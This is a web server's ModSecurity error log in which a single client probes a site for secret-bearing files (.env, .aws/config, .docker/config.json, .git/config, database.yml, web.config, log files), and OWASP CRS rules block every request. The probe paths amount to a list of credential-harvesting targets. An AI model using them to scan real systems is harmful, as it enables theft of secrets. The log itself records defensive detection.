[Sat Nov 29 01:24:28.652272 2025] [:error] [pid 395858] [client 3.99.142.85:38270] [client 3.99.142.85] ModSecurity: Warning. Matched phrase "/Web.config" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /Web.config found within REQUEST_FILENAME: /web.config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/web.config"] [unique_id "aSo9PFonenFtamV5yHYc4wAAAAI"]
[Sat Nov 29 01:24:28.652481 2025] [:error] [pid 395858] [client 3.99.142.85:38270] [client 3.99.142.85] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/web.config"] [unique_id "aSo9PFonenFtamV5yHYc4wAAAAI"]
[Sat Nov 29 01:24:28.652679 2025] [:error] [pid 395858] [client 3.99.142.85:38270] [client 3.99.142.85] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/web.config"] [unique_id "aSo9PFonenFtamV5yHYc4wAAAAI"]
[Sat Nov 29 01:24:29.396661 2025] [:error] [pid 395881] [client 3.99.142.85:38456] [client 3.99.142.85] ModSecurity: Warning. Matched phrase "database.yml" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: database.yml found within REQUEST_FILENAME: /config/database.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/config/database.yml"] [unique_id "aSo9PbVL27gtiM4DUrnKjAAAAAM"]
[Sat Nov 29 01:24:29.396935 2025] [:error] [pid 395881] [client 3.99.142.85:38456] [client 3.99.142.85] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/config/database.yml"] [unique_id "aSo9PbVL27gtiM4DUrnKjAAAAAM"]
[Sat Nov 29 01:24:29.397187 2025] [:error] [pid 395881] [client 3.99.142.85:38456] [client 3.99.142.85] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/config/database.yml"] [unique_id "aSo9PbVL27gtiM4DUrnKjAAAAAM"]
[Sat Nov 29 01:24:31.078582 2025] [:error] [pid 395858] [client 3.99.142.85:38270] [client 3.99.142.85] ModSecurity: Warning. Matched phrase ".aws/config" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/config found within REQUEST_FILENAME: /.aws/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.aws/config"] [unique_id "aSo9P1onenFtamV5yHYc5QAAAAI"]
[Sat Nov 29 01:24:31.078813 2025] [:error] [pid 395858] [client 3.99.142.85:38270] [client 3.99.142.85] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.aws/config"] [unique_id "aSo9P1onenFtamV5yHYc5QAAAAI"]
[Sat Nov 29 01:24:31.079016 2025] [:error] [pid 395858] [client 3.99.142.85:38270] [client 3.99.142.85] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.aws/config"] [unique_id "aSo9P1onenFtamV5yHYc5QAAAAI"]
[Sat Nov 29 01:24:35.755483 2025] [:error] [pid 395858] [client 3.99.142.85:38270] [client 3.99.142.85] ModSecurity: Warning. Matched phrase ".docker/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .docker/ found within REQUEST_FILENAME: /.docker/config.json"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.docker/config.json"] [unique_id "aSo9Q1onenFtamV5yHYc6QAAAAI"]
[Sat Nov 29 01:24:35.755704 2025] [:error] [pid 395858] [client 3.99.142.85:38270] [client 3.99.142.85] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.docker/config.json"] [unique_id "aSo9Q1onenFtamV5yHYc6QAAAAI"]
[Sat Nov 29 01:24:35.755900 2025] [:error] [pid 395858] [client 3.99.142.85:38270] [client 3.99.142.85] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.docker/config.json"] [unique_id "aSo9Q1onenFtamV5yHYc6QAAAAI"]
[Sat Nov 29 01:24:37.345666 2025] [:error] [pid 395881] [client 3.99.142.85:38456] [client 3.99.142.85] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/debug.log"] [unique_id "aSo9RbVL27gtiM4DUrnKkwAAAAM"]
[Sat Nov 29 01:24:37.346005 2025] [:error] [pid 395881] [client 3.99.142.85:38456] [client 3.99.142.85] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/debug.log"] [unique_id "aSo9RbVL27gtiM4DUrnKkwAAAAM"]
[Sat Nov 29 01:24:37.346204 2025] [:error] [pid 395881] [client 3.99.142.85:38456] [client 3.99.142.85] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/debug.log"] [unique_id "aSo9RbVL27gtiM4DUrnKkwAAAAM"]
[Sat Nov 29 01:24:37.770460 2025] [:error] [pid 395858] [client 3.99.142.85:38270] [client 3.99.142.85] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/errors.log"] [unique_id "aSo9RVonenFtamV5yHYc6wAAAAI"]
[Sat Nov 29 01:24:37.770799 2025] [:error] [pid 395858] [client 3.99.142.85:38270] [client 3.99.142.85] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/errors.log"] [unique_id "aSo9RVonenFtamV5yHYc6wAAAAI"]
[Sat Nov 29 01:24:37.770999 2025] [:error] [pid 395858] [client 3.99.142.85:38270] [client 3.99.142.85] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/errors.log"] [unique_id "aSo9RVonenFtamV5yHYc6wAAAAI"]
[Sat Nov 29 01:24:38.219576 2025] [:error] [pid 395887] [client 3.99.142.85:38390] [client 3.99.142.85] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aSo9RjRmtvrSM4WZBRuJ4QAAAAs"]
[Sat Nov 29 01:24:38.219802 2025] [:error] [pid 395887] [client 3.99.142.85:38390] [client 3.99.142.85] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aSo9RjRmtvrSM4WZBRuJ4QAAAAs"]
[Sat Nov 29 01:24:38.220013 2025] [:error] [pid 395887] [client 3.99.142.85:38390] [client 3.99.142.85] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aSo9RjRmtvrSM4WZBRuJ4QAAAAs"]
[Sat Nov 29 01:24:38.801019 2025] [:error] [pid 395887] [client 3.99.142.85:38390] [client 3.99.142.85] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/core/.env"] [unique_id "aSo9RjRmtvrSM4WZBRuJ4gAAAAs"]
[Sat Nov 29 01:24:38.801250 2025] [:error] [pid 395887] [client 3.99.142.85:38390] [client 3.99.142.85] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/core/.env"] [unique_id "aSo9RjRmtvrSM4WZBRuJ4gAAAAs"]
[Sat Nov 29 01:24:38.801462 2025] [:error] [pid 395887] [client 3.99.142.85:38390] [client 3.99.142.85] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/core/.env"] [unique_id "aSo9RjRmtvrSM4WZBRuJ4gAAAAs"]
[Sat Nov 29 01:24:39.232375 2025] [:error] [pid 395858] [client 3.99.142.85:38270] [client 3.99.142.85] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/datavase/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/core/Datavase/.env"] [unique_id "aSo9R1onenFtamV5yHYc7AAAAAI"]
[Sat Nov 29 01:24:39.232599 2025] [:error] [pid 395858] [client 3.99.142.85:38270] [client 3.99.142.85] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/core/Datavase/.env"] [unique_id "aSo9R1onenFtamV5yHYc7AAAAAI"]
[Sat Nov 29 01:24:39.232819 2025] [:error] [pid 395858] [client 3.99.142.85:38270] [client 3.99.142.85] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/core/Datavase/.env"] [unique_id "aSo9R1onenFtamV5yHYc7AAAAAI"]
[Sat Nov 29 01:24:39.443555 2025] [:error] [pid 395887] [client 3.99.142.85:38390] [client 3.99.142.85] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/config/.env"] [unique_id "aSo9RzRmtvrSM4WZBRuJ4wAAAAs"]
[Sat Nov 29 01:24:39.443836 2025] [:error] [pid 395887] [client 3.99.142.85:38390] [client 3.99.142.85] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/config/.env"] [unique_id "aSo9RzRmtvrSM4WZBRuJ4wAAAAs"]
[Sat Nov 29 01:24:39.444086 2025] [:error] [pid 395887] [client 3.99.142.85:38390] [client 3.99.142.85] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/config/.env"] [unique_id "aSo9RzRmtvrSM4WZBRuJ4wAAAAs"]
[Sat Nov 29 01:24:39.957715 2025] [authz_core:error] [pid 395887] [client 3.99.142.85:38390] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/.env
[Sat Nov 29 01:24:39.959451 2025] [:error] [pid 395858] [client 3.99.142.85:38270] [client 3.99.142.85] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /uploads/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/uploads/.env"] [unique_id "aSo9R1onenFtamV5yHYc7QAAAAI"]
[Sat Nov 29 01:24:39.959661 2025] [:error] [pid 395858] [client 3.99.142.85:38270] [client 3.99.142.85] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/uploads/.env"] [unique_id "aSo9R1onenFtamV5yHYc7QAAAAI"]
[Sat Nov 29 01:24:39.959839 2025] [:error] [pid 395858] [client 3.99.142.85:38270] [client 3.99.142.85] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/uploads/.env"] [unique_id "aSo9R1onenFtamV5yHYc7QAAAAI"]
[Sat Nov 29 01:24:40.677657 2025] [:error] [pid 395881] [client 3.99.142.85:38456] [client 3.99.142.85] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /saas/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/saas/.env"] [unique_id "aSo9SLVL27gtiM4DUrnKlAAAAAM"]
[Sat Nov 29 01:24:40.677878 2025] [:error] [pid 395881] [client 3.99.142.85:38456] [client 3.99.142.85] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/saas/.env"] [unique_id "aSo9SLVL27gtiM4DUrnKlAAAAAM"]
[Sat Nov 29 01:24:40.678065 2025] [:error] [pid 395881] [client 3.99.142.85:38456] [client 3.99.142.85] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/saas/.env"] [unique_id "aSo9SLVL27gtiM4DUrnKlAAAAAM"]
[Sat Nov 29 01:24:40.882242 2025] [:error] [pid 395858] [client 3.99.142.85:38270] [client 3.99.142.85] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /site/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/site/.env"] [unique_id "aSo9SFonenFtamV5yHYc7gAAAAI"]
[Sat Nov 29 01:24:40.882490 2025] [:error] [pid 395858] [client 3.99.142.85:38270] [client 3.99.142.85] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/site/.env"] [unique_id "aSo9SFonenFtamV5yHYc7gAAAAI"]
[Sat Nov 29 01:24:40.882704 2025] [:error] [pid 395858] [client 3.99.142.85:38270] [client 3.99.142.85] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/site/.env"] [unique_id "aSo9SFonenFtamV5yHYc7gAAAAI"]
